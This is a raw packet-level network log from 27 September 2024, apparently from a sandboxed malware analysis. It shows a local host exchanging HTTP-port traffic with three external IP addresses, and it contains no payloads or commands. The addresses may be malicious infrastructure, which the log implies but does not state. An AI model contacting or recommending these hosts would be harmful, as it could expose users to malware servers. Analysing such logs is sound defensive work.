Sep 27, 2024 04:21:04.559758902 CEST	80	49711	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:04.559770107 CEST	80	49711	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:04.559773922 CEST	49711	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:04.559797049 CEST	49711	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:04.559844017 CEST	49711	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:04.559916019 CEST	80	49711	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:04.559927940 CEST	80	49711	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:04.559937954 CEST	80	49711	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:04.559967041 CEST	49711	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:04.559999943 CEST	49711	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:04.560010910 CEST	80	49711	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:04.560023069 CEST	80	49711	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:04.560040951 CEST	80	49711	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:04.560053110 CEST	80	49711	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:04.560055017 CEST	49711	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:04.560066938 CEST	80	49711	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:04.560075998 CEST	49711	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:04.560080051 CEST	80	49711	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:04.560105085 CEST	49711	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:04.560126066 CEST	49711	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:04.560798883 CEST	80	49711	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:04.560847998 CEST	80	49711	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:04.560854912 CEST	49711	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:04.560859919 CEST	80	49711	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:04.560875893 CEST	80	49711	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:04.560889006 CEST	80	49711	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:04.560893059 CEST	49711	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:04.560911894 CEST	49711	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:04.560956955 CEST	49711	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:04.560982943 CEST	80	49711	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:04.560995102 CEST	80	49711	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:04.561006069 CEST	80	49711	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:04.561017990 CEST	80	49711	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:04.561037064 CEST	49711	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:04.561068058 CEST	49711	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:04.561681032 CEST	80	49711	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:04.561731100 CEST	49711	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:04.561753988 CEST	80	49711	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:04.561767101 CEST	80	49711	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:04.561777115 CEST	80	49711	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:04.561804056 CEST	49711	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:04.561805964 CEST	80	49711	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:04.561819077 CEST	80	49711	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:04.561824083 CEST	49711	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:04.561831951 CEST	80	49711	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:04.561860085 CEST	49711	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:04.561897039 CEST	49711	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:04.562375069 CEST	80	49711	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:04.562444925 CEST	49711	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:04.626734018 CEST	80	49711	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:04.626851082 CEST	49711	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:04.627032042 CEST	80	49711	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:04.627091885 CEST	49711	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:04.627180099 CEST	80	49711	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:04.627191067 CEST	80	49711	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:04.627233028 CEST	49711	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:04.627262115 CEST	49711	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:04.627334118 CEST	80	49711	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:04.627347946 CEST	80	49711	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:04.627357960 CEST	80	49711	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:04.627370119 CEST	80	49711	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:04.627379894 CEST	49711	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:04.627435923 CEST	49711	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:04.627435923 CEST	49711	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:04.627499104 CEST	80	49711	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:04.627511024 CEST	80	49711	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:04.627521992 CEST	80	49711	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:04.627533913 CEST	80	49711	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:04.627547026 CEST	80	49711	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:04.627552986 CEST	49711	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:04.627557993 CEST	80	49711	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:04.627577066 CEST	80	49711	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:04.627593040 CEST	49711	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:04.627593040 CEST	49711	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:04.627620935 CEST	80	49711	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:04.627624035 CEST	49711	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:04.627660036 CEST	49711	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:04.663208008 CEST	80	49711	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:04.663220882 CEST	80	49711	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:04.663230896 CEST	80	49711	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:04.663243055 CEST	80	49711	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:04.663264036 CEST	49711	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:04.663290024 CEST	49711	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:04.663513899 CEST	80	49711	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:04.663527012 CEST	80	49711	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:04.663537979 CEST	80	49711	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:04.663548946 CEST	80	49711	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:04.663559914 CEST	80	49711	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:04.663559914 CEST	49711	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:04.663573027 CEST	80	49711	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:04.663594007 CEST	49711	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:04.663619041 CEST	49711	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:04.663641930 CEST	80	49711	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:04.663655043 CEST	80	49711	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:04.663671017 CEST	80	49711	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:04.663678885 CEST	49711	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:04.663705111 CEST	49711	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:04.663805962 CEST	80	49711	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:04.663851976 CEST	49711	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:04.663885117 CEST	80	49711	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:04.663896084 CEST	80	49711	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:04.663906097 CEST	80	49711	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:04.663918972 CEST	80	49711	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:04.663930893 CEST	80	49711	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:04.663938046 CEST	49711	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:04.663954973 CEST	49711	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:04.663966894 CEST	49711	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:04.664026976 CEST	80	49711	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:04.664038897 CEST	80	49711	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:04.664072037 CEST	49711	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:04.664155006 CEST	80	49711	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:04.664166927 CEST	80	49711	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:04.664179087 CEST	80	49711	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:04.664190054 CEST	80	49711	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:04.664215088 CEST	49711	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:04.664230108 CEST	49711	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:04.664271116 CEST	80	49711	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:04.664283991 CEST	80	49711	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:04.664294958 CEST	80	49711	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:04.664305925 CEST	80	49711	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:04.664319038 CEST	49711	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:04.664339066 CEST	49711	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:04.664343119 CEST	80	49711	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:04.664355040 CEST	80	49711	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:04.664380074 CEST	49711	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:04.664401054 CEST	49711	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:04.664504051 CEST	80	49711	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:04.664515018 CEST	80	49711	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:04.664526939 CEST	80	49711	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:04.664550066 CEST	49711	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:04.664568901 CEST	49711	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:04.664659977 CEST	80	49711	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:04.664671898 CEST	80	49711	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:04.664684057 CEST	80	49711	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:04.664705038 CEST	49711	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:04.664730072 CEST	49711	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:04.664817095 CEST	80	49711	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:04.664830923 CEST	80	49711	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:04.664870977 CEST	49711	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:04.664935112 CEST	80	49711	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:04.664947987 CEST	80	49711	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:04.664958954 CEST	80	49711	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:04.664963961 CEST	49711	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:04.664972067 CEST	80	49711	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:04.664979935 CEST	49711	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:04.665004969 CEST	49711	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:04.665026903 CEST	49711	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:04.665081024 CEST	80	49711	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:04.665092945 CEST	80	49711	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:04.665107012 CEST	80	49711	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:04.665117979 CEST	49711	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:04.665144920 CEST	49711	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:04.665256977 CEST	80	49711	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:04.665268898 CEST	80	49711	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:04.665282011 CEST	80	49711	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:04.665304899 CEST	49711	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:04.665316105 CEST	49711	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:04.665321112 CEST	80	49711	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:04.665339947 CEST	80	49711	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:04.665352106 CEST	80	49711	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:04.665363073 CEST	80	49711	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:04.665364027 CEST	49711	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:04.665391922 CEST	49711	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:04.665430069 CEST	80	49711	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:04.665476084 CEST	49711	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:04.665591002 CEST	80	49711	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:04.665602922 CEST	80	49711	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:04.665613890 CEST	80	49711	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:04.665626049 CEST	80	49711	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:04.665632963 CEST	49711	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:04.665659904 CEST	49711	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:04.665826082 CEST	80	49711	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:04.665838003 CEST	80	49711	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:04.665868044 CEST	49711	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:04.665891886 CEST	49711	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:04.665945053 CEST	80	49711	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:04.665961981 CEST	80	49711	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:04.665975094 CEST	80	49711	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:04.665986061 CEST	80	49711	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:04.665990114 CEST	49711	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:04.665998936 CEST	80	49711	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:04.666009903 CEST	80	49711	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:04.666019917 CEST	49711	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:04.666021109 CEST	80	49711	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:04.666054010 CEST	49711	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:04.666073084 CEST	49711	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:04.666083097 CEST	80	49711	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:04.666095018 CEST	80	49711	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:04.666129112 CEST	49711	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:04.666148901 CEST	49711	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:04.666258097 CEST	80	49711	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:04.666270018 CEST	80	49711	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:04.666282892 CEST	80	49711	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:04.666301966 CEST	49711	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:04.666335106 CEST	49711	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:04.666425943 CEST	80	49711	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:04.666436911 CEST	80	49711	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:04.666448116 CEST	80	49711	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:04.666460037 CEST	80	49711	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:04.666491985 CEST	49711	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:04.666511059 CEST	80	49711	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:04.666520119 CEST	49711	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:04.666522980 CEST	80	49711	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:04.666536093 CEST	80	49711	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:04.666546106 CEST	80	49711	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:04.666562080 CEST	49711	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:04.666598082 CEST	49711	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:04.666688919 CEST	80	49711	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:04.666701078 CEST	80	49711	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:04.666712046 CEST	80	49711	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:04.666723967 CEST	80	49711	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:04.666734934 CEST	80	49711	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:04.666747093 CEST	80	49711	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:04.666758060 CEST	80	49711	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:04.666765928 CEST	49711	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:04.666765928 CEST	49711	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:04.666802883 CEST	49711	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:04.666836977 CEST	80	49711	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:04.666850090 CEST	80	49711	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:04.666862011 CEST	80	49711	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:04.666891098 CEST	49711	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:04.666918039 CEST	49711	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:04.666974068 CEST	80	49711	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:04.666985989 CEST	80	49711	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:04.666997910 CEST	80	49711	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:04.667022943 CEST	49711	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:04.667053938 CEST	49711	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:04.667135954 CEST	80	49711	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:04.667148113 CEST	80	49711	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:04.667159081 CEST	80	49711	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:04.667186022 CEST	49711	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:04.667212963 CEST	80	49711	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:04.667212963 CEST	49711	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:04.667228937 CEST	80	49711	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:04.667242050 CEST	80	49711	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:04.667253017 CEST	80	49711	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:04.667257071 CEST	49711	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:04.667293072 CEST	49711	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:04.667323112 CEST	49711	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:04.668648005 CEST	80	49711	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:04.668709993 CEST	49711	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:04.668788910 CEST	80	49711	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:04.668840885 CEST	49711	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:04.714476109 CEST	80	49711	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:04.714485884 CEST	80	49711	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:04.714497089 CEST	80	49711	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:04.714540958 CEST	49711	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:04.714576960 CEST	49711	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:05.364763975 CEST	49710	80	192.168.2.5	185.215.113.16
Sep 27, 2024 04:21:05.365042925 CEST	49712	80	192.168.2.5	185.215.113.16
Sep 27, 2024 04:21:05.369904041 CEST	80	49712	185.215.113.16	192.168.2.5
Sep 27, 2024 04:21:05.370018959 CEST	80	49710	185.215.113.16	192.168.2.5
Sep 27, 2024 04:21:05.370090961 CEST	49710	80	192.168.2.5	185.215.113.16
Sep 27, 2024 04:21:05.370172024 CEST	49712	80	192.168.2.5	185.215.113.16
Sep 27, 2024 04:21:05.370484114 CEST	49712	80	192.168.2.5	185.215.113.16
Sep 27, 2024 04:21:05.375220060 CEST	80	49712	185.215.113.16	192.168.2.5
Sep 27, 2024 04:21:06.072520018 CEST	80	49712	185.215.113.16	192.168.2.5
Sep 27, 2024 04:21:06.076575994 CEST	49712	80	192.168.2.5	185.215.113.16
Sep 27, 2024 04:21:06.079277992 CEST	49713	80	192.168.2.5	194.116.215.195
Sep 27, 2024 04:21:06.084212065 CEST	80	49713	194.116.215.195	192.168.2.5
Sep 27, 2024 04:21:06.084322929 CEST	49713	80	192.168.2.5	194.116.215.195
Sep 27, 2024 04:21:06.084443092 CEST	49713	80	192.168.2.5	194.116.215.195
Sep 27, 2024 04:21:06.089236975 CEST	80	49713	194.116.215.195	192.168.2.5
Sep 27, 2024 04:21:06.704785109 CEST	80	49713	194.116.215.195	192.168.2.5
Sep 27, 2024 04:21:06.704807043 CEST	80	49713	194.116.215.195	192.168.2.5
Sep 27, 2024 04:21:06.704818964 CEST	80	49713	194.116.215.195	192.168.2.5
Sep 27, 2024 04:21:06.704832077 CEST	80	49713	194.116.215.195	192.168.2.5
Sep 27, 2024 04:21:06.704844952 CEST	80	49713	194.116.215.195	192.168.2.5
Sep 27, 2024 04:21:06.704853058 CEST	49713	80	192.168.2.5	194.116.215.195
Sep 27, 2024 04:21:06.704896927 CEST	49713	80	192.168.2.5	194.116.215.195
Sep 27, 2024 04:21:06.704925060 CEST	49713	80	192.168.2.5	194.116.215.195
Sep 27, 2024 04:21:06.704941988 CEST	80	49713	194.116.215.195	192.168.2.5
Sep 27, 2024 04:21:06.704955101 CEST	80	49713	194.116.215.195	192.168.2.5
Sep 27, 2024 04:21:06.704982042 CEST	49713	80	192.168.2.5	194.116.215.195
Sep 27, 2024 04:21:06.704997063 CEST	49713	80	192.168.2.5	194.116.215.195
Sep 27, 2024 04:21:06.705005884 CEST	80	49713	194.116.215.195	192.168.2.5
Sep 27, 2024 04:21:06.705046892 CEST	49713	80	192.168.2.5	194.116.215.195
Sep 27, 2024 04:21:06.705082893 CEST	80	49713	194.116.215.195	192.168.2.5
Sep 27, 2024 04:21:06.705123901 CEST	49713	80	192.168.2.5	194.116.215.195
Sep 27, 2024 04:21:06.705144882 CEST	80	49713	194.116.215.195	192.168.2.5
Sep 27, 2024 04:21:06.705184937 CEST	49713	80	192.168.2.5	194.116.215.195
Sep 27, 2024 04:21:06.709805012 CEST	80	49713	194.116.215.195	192.168.2.5
Sep 27, 2024 04:21:06.709829092 CEST	80	49713	194.116.215.195	192.168.2.5
Sep 27, 2024 04:21:06.709872007 CEST	49713	80	192.168.2.5	194.116.215.195
Sep 27, 2024 04:21:06.709892988 CEST	49713	80	192.168.2.5	194.116.215.195
Sep 27, 2024 04:21:06.709935904 CEST	80	49713	194.116.215.195	192.168.2.5
Sep 27, 2024 04:21:06.709978104 CEST	49713	80	192.168.2.5	194.116.215.195
Sep 27, 2024 04:21:06.795336962 CEST	80	49713	194.116.215.195	192.168.2.5
Sep 27, 2024 04:21:06.795424938 CEST	80	49713	194.116.215.195	192.168.2.5
Sep 27, 2024 04:21:06.795430899 CEST	49713	80	192.168.2.5	194.116.215.195
Sep 27, 2024 04:21:06.795458078 CEST	80	49713	194.116.215.195	192.168.2.5
Sep 27, 2024 04:21:06.795486927 CEST	49713	80	192.168.2.5	194.116.215.195
Sep 27, 2024 04:21:06.795511007 CEST	49713	80	192.168.2.5	194.116.215.195
Sep 27, 2024 04:21:06.795511007 CEST	80	49713	194.116.215.195	192.168.2.5
Sep 27, 2024 04:21:06.795547009 CEST	80	49713	194.116.215.195	192.168.2.5
Sep 27, 2024 04:21:06.795568943 CEST	49713	80	192.168.2.5	194.116.215.195
Sep 27, 2024 04:21:06.795586109 CEST	80	49713	194.116.215.195	192.168.2.5
Sep 27, 2024 04:21:06.795602083 CEST	80	49713	194.116.215.195	192.168.2.5
Sep 27, 2024 04:21:06.795607090 CEST	49713	80	192.168.2.5	194.116.215.195
Sep 27, 2024 04:21:06.795619965 CEST	80	49713	194.116.215.195	192.168.2.5
Sep 27, 2024 04:21:06.795631886 CEST	49713	80	192.168.2.5	194.116.215.195
Sep 27, 2024 04:21:06.795655966 CEST	49713	80	192.168.2.5	194.116.215.195
Sep 27, 2024 04:21:06.795669079 CEST	49713	80	192.168.2.5	194.116.215.195
Sep 27, 2024 04:21:06.796350956 CEST	80	49713	194.116.215.195	192.168.2.5
Sep 27, 2024 04:21:06.796364069 CEST	80	49713	194.116.215.195	192.168.2.5
Sep 27, 2024 04:21:06.796375990 CEST	80	49713	194.116.215.195	192.168.2.5
Sep 27, 2024 04:21:06.796386957 CEST	80	49713	194.116.215.195	192.168.2.5
Sep 27, 2024 04:21:06.796408892 CEST	49713	80	192.168.2.5	194.116.215.195
Sep 27, 2024 04:21:06.796444893 CEST	49713	80	192.168.2.5	194.116.215.195
Sep 27, 2024 04:21:06.796868086 CEST	80	49713	194.116.215.195	192.168.2.5
Sep 27, 2024 04:21:06.796880007 CEST	80	49713	194.116.215.195	192.168.2.5
Sep 27, 2024 04:21:06.796891928 CEST	80	49713	194.116.215.195	192.168.2.5
Sep 27, 2024 04:21:06.796904087 CEST	80	49713	194.116.215.195	192.168.2.5
Sep 27, 2024 04:21:06.796926022 CEST	49713	80	192.168.2.5	194.116.215.195
Sep 27, 2024 04:21:06.796945095 CEST	49713	80	192.168.2.5	194.116.215.195
Sep 27, 2024 04:21:06.797461987 CEST	80	49713	194.116.215.195	192.168.2.5
Sep 27, 2024 04:21:06.797472954 CEST	80	49713	194.116.215.195	192.168.2.5
Sep 27, 2024 04:21:06.797483921 CEST	80	49713	194.116.215.195	192.168.2.5
Sep 27, 2024 04:21:06.797524929 CEST	49713	80	192.168.2.5	194.116.215.195
Sep 27, 2024 04:21:06.797524929 CEST	49713	80	192.168.2.5	194.116.215.195
Sep 27, 2024 04:21:06.797559023 CEST	80	49713	194.116.215.195	192.168.2.5
Sep 27, 2024 04:21:06.797571898 CEST	80	49713	194.116.215.195	192.168.2.5
Sep 27, 2024 04:21:06.797584057 CEST	80	49713	194.116.215.195	192.168.2.5
Sep 27, 2024 04:21:06.797605038 CEST	49713	80	192.168.2.5	194.116.215.195
Sep 27, 2024 04:21:06.797626972 CEST	49713	80	192.168.2.5	194.116.215.195
Sep 27, 2024 04:21:06.797626972 CEST	49713	80	192.168.2.5	194.116.215.195
Sep 27, 2024 04:21:06.798383951 CEST	80	49713	194.116.215.195	192.168.2.5
Sep 27, 2024 04:21:06.798439026 CEST	49713	80	192.168.2.5	194.116.215.195
Sep 27, 2024 04:21:06.800470114 CEST	80	49713	194.116.215.195	192.168.2.5
Sep 27, 2024 04:21:06.800502062 CEST	80	49713	194.116.215.195	192.168.2.5
Sep 27, 2024 04:21:06.800523043 CEST	49713	80	192.168.2.5	194.116.215.195
Sep 27, 2024 04:21:06.800543070 CEST	49713	80	192.168.2.5	194.116.215.195
Sep 27, 2024 04:21:06.800548077 CEST	80	49713	194.116.215.195	192.168.2.5
